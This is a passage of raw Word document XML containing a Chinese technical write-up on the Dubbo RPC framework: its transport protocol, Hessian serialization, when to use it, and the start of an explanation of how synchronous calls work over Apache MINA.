          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>传输协议：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00B355D3" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>传输方式：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>异步传输</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00B355D3" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>序列化：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hessian</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>二进制序列化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00B355D3" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>适用范围：传入传出参数数据包较小（建议小于</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>100K</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>），消费者比提供者个数多，单一消费者无法压满提供者，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>尽量不要用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议传输大文件或超大字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00B355D3" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>适用场景：常规远程服务方法调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通常，一个典型的同步远程调用应该是这样的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="3D3D3D"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3992245" cy="1057910"/>
            <wp:effectExtent l="19050" t="0" r="8255" b="0"/>
            <wp:docPr id="56" name="图片 2" descr="【原创】Alibaba Dubbo框架同步调用原理分析-1 - sun - 学无止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原创】Alibaba Dubbo框架同步调用原理分析-1 - sun - 学无止境"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId299" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3992245" cy="1057910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>客户端线程调用远程接口，向服务端发送请求，同时当前线程应该处于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>暂停</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>状态，即线程不能向后执行了，必需要拿到服务端给自己的结果后才能向后执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务端接到客户端请求后，处理请求，将结果给客户端</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>客户端收到结果，然后当前线程继续往后执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里使用到了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（采用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>apache mina</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>框架做底层调用）来建立长连接，发送、接收数据，底层使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>apache mina</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>框架的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IoSession</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进行发送消息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文档及源代码可知，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>底层使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发送消息的形式进行数据传递，结合了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mina</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>框架，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IoSession.write()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法，这个方法调用后对于整个远程调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
